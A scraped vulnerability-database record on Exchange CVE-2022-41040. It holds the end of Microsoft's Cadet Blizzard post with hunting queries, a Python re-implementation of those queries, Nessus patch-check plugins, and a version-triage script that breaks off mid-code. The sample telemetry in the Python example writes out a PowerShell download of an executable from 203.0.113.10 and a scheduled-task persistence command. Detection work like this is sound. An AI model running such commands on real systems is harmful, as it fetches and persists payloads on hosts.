ago(14d) \n | where FileName =~ \"schtasks.exe\" \n | where (ProcessCommandLine contains \"splservice\" or ProcessCommandLine contains \"spl32\") and \n (ProcessCommandLine contains \"127.0.0.1\" or ProcessCommandLine contains \"2>&1\")\n \n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u201cTI map\u201d) to automatically match indicators associated with Cadet Blizzard in Microsoft Defender Threat Intelligence (MDTI) with data in their workspace. 
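The three Microsoft 365 Defender hunting queries above, re-implemented as an added example in Python (not code from the Microsoft post) over constructed process-creation records, so they can be run offline and the reason each filter looks the way it does is visible alongside it. The field names, host names, the 203.0.113.10 address and every command line are assumptions built for the example, not observed Cadet Blizzard activity; the wmiexec command-line shape in the comment is how Impacket's wmiexec.py runs commands and is the reason the first query keys on `2>&1`.

```python
"""Added example, not code from the Microsoft post: the three hunting queries
(wmiexec-style recon via WmiPrvSE.exe -> cmd.exe, PowerShell DownloadFile,
and splservice/spl32 scheduled tasks) over constructed DeviceProcessEvents
style records. Field names, hosts, addresses and command lines are assumptions."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Impacket's wmiexec.py executes every command through WMI as
#   cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1
# so the parent is WmiPrvSE.exe, the child is cmd.exe and "2>&1" is always present.
WMIEXEC_CHILD_PATTERNS = ("get-volume", "systeminfo", "reg.exe", "downloadfile",
                          "nslookup", "query session", "route print")
STDERR_REDIRECT = re.compile(r"2>&1")


@dataclass
class ProcessEvent:
    device_name: str
    initiating_process_file_name: str   # parent image name
    file_name: str                      # child image name
    process_command_line: str


def has_any(text: str, needles) -> bool:
    """Approximates KQL has_any (case-insensitive)."""
    low = text.lower()
    return any(n.lower() in low for n in needles)


def is_wmiexec_recon(e: ProcessEvent) -> bool:
    """Query 1: cmd.exe spawned by WmiPrvSE.exe, stderr redirected with 2>&1,
    running one of the commands the post lists for Cadet Blizzard."""
    return (e.initiating_process_file_name.lower() == "wmiprvse.exe"
            and e.file_name.lower() == "cmd.exe"
            and STDERR_REDIRECT.search(e.process_command_line) is not None
            and has_any(e.process_command_line, WMIEXEC_CHILD_PATTERNS))


def is_powershell_download(e: ProcessEvent) -> bool:
    """Query 2: powershell.exe invoking WebClient.DownloadFile. KQL == is
    case-sensitive, so the image name is compared exactly as the query does."""
    return (e.file_name == "powershell.exe"
            and "downloadfile" in e.process_command_line.lower())


def is_suspicious_schtask(e: ProcessEvent) -> bool:
    """Query 3: schtasks.exe creating a task named like the actor's
    splservice/spl32 tasks that points at loopback or redirects stderr."""
    cmd = e.process_command_line.lower()
    return (e.file_name.lower() == "schtasks.exe"
            and ("splservice" in cmd or "spl32" in cmd)
            and ("127.0.0.1" in cmd or "2>&1" in cmd))


HUNTS = {
    "wmiexec_recon": is_wmiexec_recon,
    "powershell_downloadfile": is_powershell_download,
    "suspicious_schtask": is_suspicious_schtask,
}


def run_hunts(events: Iterable[ProcessEvent]) -> Dict[str, List[ProcessEvent]]:
    """Apply every hunt to every event; returns hits keyed by hunt name."""
    hits: Dict[str, List[ProcessEvent]] = {name: [] for name in HUNTS}
    for e in events:
        for name, rule in HUNTS.items():
            if rule(e):
                hits[name].append(e)
    return hits


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    ProcessEvent("dc01", "WmiPrvSE.exe", "cmd.exe",
                 r"cmd.exe /Q /c systeminfo 1> \\127.0.0.1\ADMIN$\__1686000000.12 2>&1"),
    ProcessEvent("dc01", "WmiPrvSE.exe", "cmd.exe",
                 r"cmd.exe /Q /c powershell -c get-volume 1> \\127.0.0.1\ADMIN$\__1686000001.5 2>&1"),
    ProcessEvent("fs02", "WmiPrvSE.exe", "cmd.exe", "cmd.exe /c ipconfig /all"),
    ProcessEvent("fs02", "explorer.exe", "powershell.exe",
                 "powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                 "'http://203.0.113.10/USORead.exe','C:\\ProgramData\\USORead.exe')\""),
    ProcessEvent("fs02", "cmd.exe", "schtasks.exe",
                 r'schtasks /create /tn splservice /sc minute /tr "C:\ProgramData\USORead.exe 127.0.0.1 2>&1"'),
    ProcessEvent("fs02", "cmd.exe", "schtasks.exe",
                 r'schtasks /create /tn BackupJob /sc daily /tr "C:\Tools\backup.exe"'),
]


if __name__ == "__main__":
    for name, matched in run_hunts(SAMPLE_EVENTS).items():
        for e in matched:
            print(f"{name}: {e.device_name} {e.process_command_line}")
```

The third sample (`cmd.exe /c ipconfig /all` under WmiPrvSE.exe) is deliberately a miss: WMI-launched commands without the `2>&1` redirect are common from management tooling, which is why the original query requires the redirect rather than alerting on every WmiPrvSE.exe child.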
If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the MDTI connector and analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>.\n\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog in addition to Microsoft 365 Defender detections list above.\n\n * [Web Shell Activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web Shells Threat Protection/Hunting Queries/WebShellActivity.yaml>)\n * [Commands executed by WMI](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Windows Security Events/Hunting Queries/CommandsexecutedbyWMIonnewhosts-potentialImpacket.yaml>)\n * [Potential Impacket Execution](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker Tools Threat Protection Essentials/Hunting Queries/PotentialImpacketExecution.yaml>)\n * [Dumping LSASS using procdump](<https://github.com/Azure/Azure-Sentinel/blob/ccbb0e644810e0edf3b8ee4f284fd05ea1cc46ad/Hunting%20Queries/Microsoft%20365%20Defender/Credential%20Access/procdump-lsass-credentials.yaml>)\n * [Potential Microsoft Defender Tampering](<https://github.com/Azure/Azure-Sentinel/blob/c5e3281a8a30ea658ce8f8234a182a63ceb996d7/Hunting%20Queries/Microsoft%20365%20Defender/Defense%20evasion/PotentialMicrosoftDefenderTampering%5BSolarigate%5D.yaml>)\n\n### References\n\n * <https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>\n * <https://github.com/flozz/p0wny-shell>\n * <https://github.com/sensepost/reGeorg>\n * <https://cert.gov.ua/article/3947787>\n * <https://github.com/fortra/impacket>\n * 
<https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>\n\n## Further reading\n\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.\n\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>.\n\nThe post [Cadet Blizzard emerges as a novel and distinct Russian threat actor](<https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-06-14T16:00:00", "type": "mssecure", "title": "Cadet Blizzard emerges as a novel and distinct Russian threat actor", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-26084", "CVE-2021-4034", "CVE-2022-41040"], "modified": "2023-06-14T16:00:00", "id": 
"MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "href": "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-09-16T12:46:11", "description": "The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day vulnerabilities, dubbed ProxyNotShell:\n\n - An unspecified authenticated server-side request forgery (SSRF) vulnerability. (CVE-2022-41040)\n\n - An unspecified authenticated remote code execution (RCE) vulnerability when PowerShell is accessible to the attacker. (CVE-2022-41082)\n\nPlease refer to Microsoft for guidance on mitigations for these vulnerabilities.", "cvss3": {}, "published": "2022-10-05T00:00:00", "type": "nessus", "title": "Microsoft Exchange Server October 2022 Zero-day Vulnerabilities (ProxyNotShell)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-01-12T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS22_OCT_EXCHANGE_ZERODAY.NASL", "href": "https://www.tenable.com/plugins/nessus/165705", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc. 
\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(165705);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2022-41040\", \"CVE-2022-41082\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/21\");\n script_xref(name:\"IAVA\", value:\"2022-A-0474-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0031\");\n\n script_name(english:\"Microsoft Exchange Server October 2022 Zero-day Vulnerabilities (ProxyNotShell)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host is potentially affected by multiple zero-day\nvulnerabilities, dubbed ProxyNotShell:\n\n - An unspecified authenticated server-side request forgery (SSRF) vulnerability. (CVE-2022-41040)\n\n - An unspecified authenticated remote code execution (RCE) vulnerability when PowerShell is accessible to the\n attacker. 
(CVE-2022-41082)\n\nPlease refer to Microsoft for guidance on mitigations for these vulnerabilities.\");\n # https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57fc3035\");\n # https://www.tenable.com/blog/cve-2022-41040-and-cve-2022-41082-proxyshell-variant-exploited-in-the-wild\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7cacb5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://community.tenable.com/s/feed/0D53a00008oIvkYCAS\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact Microsoft for patching guidance.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41082\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyNotShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'cu': 23,\n 'unsupported_cu': 22,\n 'fixed_version': '15.0.1497.42.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2016',\n 'cu': 22,\n 'unsupported_cu': 21,\n 'fixed_version': '15.1.2375.32.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product': '2016',\n 'cu': 23,\n 'unsupported_cu': 21,\n 'fixed_version': '15.1.2507.13.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2019',\n 'cu': 11,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.986.36',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n },\n {\n 'product' : '2019',\n 'cu': 12,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.1118.15.1',\n 'fixed_display': 'Contact Microsoft for patching guidance.'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-16T12:46:10", "description": "This plugin detects the potential presence of a web shell in selected directories and this can be indicative that the host might have been exploited with CVE-2022-41040 / CVE-2022-41082. 
It is recommended that the results are manually verified and appropriate remediation actions taken.\n\nNote that Nessus has not tested for this issue but has instead looked for files that could potentially indicate compromise.", "cvss3": {}, "published": "2022-10-03T00:00:00", "type": "nessus", "title": "Potential exposure to Microsoft Exchange CVE-2022-41040 / CVE-2022-41082 Exploit", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-07-17T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "EXCHANGE_CVE-2022-41040_IOC.NBIN", "href": "https://www.tenable.com/plugins/nessus/165629", "sourceData": "Binary data exchange_cve-2022-41040_ioc.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-16T16:00:35", "description": "The Microsoft Exchange Server installed on the remote host is missing a security update. It is, therefore, affected by multiple vulnerabilities as referenced in the Nov, 2022 security bulletin.\n\n - Microsoft Exchange Server Spoofing Vulnerability (CVE-2022-41078, CVE-2022-41079)\n\n - Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2022-41040, CVE-2022-41080, CVE-2022-41123)\n\n - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2022-41082)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-11T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Exchange Server (Nov 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41078", "CVE-2022-41079", "CVE-2022-41080", "CVE-2022-41082", "CVE-2022-41123"], "modified": "2023-01-12T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS22_NOV_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/167281", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, 
Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167281);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\n \"CVE-2022-41040\",\n \"CVE-2022-41078\",\n \"CVE-2022-41079\",\n \"CVE-2022-41080\",\n \"CVE-2022-41082\",\n \"CVE-2022-41123\"\n );\n script_xref(name:\"MSFT\", value:\"MS22-5019758\");\n script_xref(name:\"MSKB\", value:\"5019758\");\n script_xref(name:\"IAVA\", value:\"2022-A-0474-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/10/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/01/31\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0031\");\n\n script_name(english:\"Security Updates for Microsoft Exchange Server (Nov 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host is missing a security update. 
It is, therefore, affected by\nmultiple vulnerabilities as referenced in the Nov, 2022 security bulletin.\n\n - Microsoft Exchange Server Spoofing Vulnerability (CVE-2022-41078, CVE-2022-41079)\n\n - Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2022-41040, CVE-2022-41080, \n CVE-2022-41123)\n\n - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2022-41082)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5019758\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB5019758\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyNotShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'cu': 23,\n 'unsupported_cu': 22,\n 'fixed_version': '15.0.1497.44',\n 'kb': '5019076'\n },\n {\n 'product' : '2016',\n 'cu': 22,\n 'unsupported_cu': 21,\n 'fixed_version': '15.1.2375.37',\n 'kb': '5019758'\n },\n {\n 'product': '2016',\n 'cu': 23,\n 'unsupported_cu': 21,\n 'fixed_version': '15.1.2507.16',\n 'kb': '5019758'\n },\n {\n 'product' : '2019',\n 'cu': 11,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.986.36',\n 'kb': '5019758'\n },\n {\n 'product' : '2019',\n 'cu': 12,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.1118.20',\n 'kb': '5019758'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report(\n app_info:app_info,\n bulletin:'MS22-11',\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-11T14:57:41", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to execute unauthorized arbitrary code. (CVE-2021-28483, CVE-2021-28482, CVE-2021-28481, CVE-2021-28480, CVE-2021-34473)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. 
(CVE-2021-34523)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-33766)", "cvss3": {}, "published": "2021-04-13T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Exchange Server (April 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483", "CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_APR_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/148476", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148476);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-28480\",\n \"CVE-2021-28481\",\n \"CVE-2021-28482\",\n \"CVE-2021-28483\",\n \"CVE-2021-33766\",\n \"CVE-2021-34473\",\n \"CVE-2021-34523\"\n );\n script_xref(name:\"MSKB\", value:\"5001779\");\n script_xref(name:\"MSFT\", value:\"MS21-5001779\");\n script_xref(name:\"IAVA\", value:\"2021-A-0160-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0040\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0022\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0021\");\n\n script_name(english:\"Security Updates for Microsoft Exchange Server (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is 
affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to\n execute unauthorized arbitrary code. (CVE-2021-28483, CVE-2021-28482,\n CVE-2021-28481, CVE-2021-28480, CVE-2021-34473)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to\n gain elevated privileges. (CVE-2021-34523)\n\n - An information disclosure vulnerability. An attacker can exploit this to\n disclose potentially sensitive information. (CVE-2021-33766)\");\n # https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-april-13-2021-kb5001779-8e08f3b3-fc7b-466c-bbb7-5d5aa16ef064\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3bdeeea7\");\n # https://msrc-blog.microsoft.com/2021/04/13/april-2021-update-tuesday-packages-now-available/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b66291c9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB5001779\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34473\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-34523\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'unsupported_cu' : 22,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.18',\n 'kb': '5001779'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 18,\n 'cu' : 20,\n 'min_version': '15.01.2176.0',\n 'fixed_version': '15.01.2176.14',\n 'kb': '5001779'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 18,\n 'cu' : 20,\n 'min_version': '15.01.2242.0',\n 'fixed_version': '15.01.2242.10',\n 'kb': '5001779'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 8,\n 'min_version': '15.02.792.0',\n 'fixed_version': '15.02.792.15',\n 'kb': '5001779'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 9,\n 'min_version': '15.02.858.0',\n 'fixed_version': '15.02.858.12',\n 'kb': '5001779'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS21-05',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2023-08-11T23:30:47", "description": "Akamai Security Research has released web application firewall protections for Microsoft Exchange CVE-2022-41040 and CVE-2022-41082.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, 
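The three version-check plugins quoted above all reduce to the same operation: read the installed Exchange build, work out which cumulative update (CU) it belongs to, compare it with the first fixed build for that CU, and report an unsupported CU when no fixed build exists for it. The Python below is an added example that mirrors that logic for the November 2022 table (KB5019758 / KB5019076); it is not Tenable's code and is not how the NASL library implements the check. The product and fixed-build values are copied from the Nov 2022 plugin's constraints array; the mapping of a build's third component (1497, 2375, 2507, 986, 1118) to a CU, the function names, the status labels and the sample inventory are this example's own assumptions.

```python
"""Exchange build-number triage mirroring the constraint tables in the Nessus
plugins quoted above.  Added example, not Tenable's code: the fixed builds are
read off the Nov 2022 plugin's constraints array; the build-family -> CU map,
the function names, the status labels and the sample builds are assumptions of
this example."""
from __future__ import annotations

# Product by the first two version components (assumption: 15.0/15.1/15.2).
PRODUCT_BY_MAJOR_MINOR = {(15, 0): "2013", (15, 1): "2016", (15, 2): "2019"}

# (product, CU, build family, first fixed build), values taken from the
# SMB_NT_MS22_NOV_EXCHANGE.NASL constraints (KB5019758 / KB5019076).
NOV_2022_FIXED = [
    ("2013", 23, (15, 0, 1497), (15, 0, 1497, 44)),
    ("2016", 22, (15, 1, 2375), (15, 1, 2375, 37)),
    ("2016", 23, (15, 1, 2507), (15, 1, 2507, 16)),
    ("2019", 11, (15, 2, 986), (15, 2, 986, 36)),
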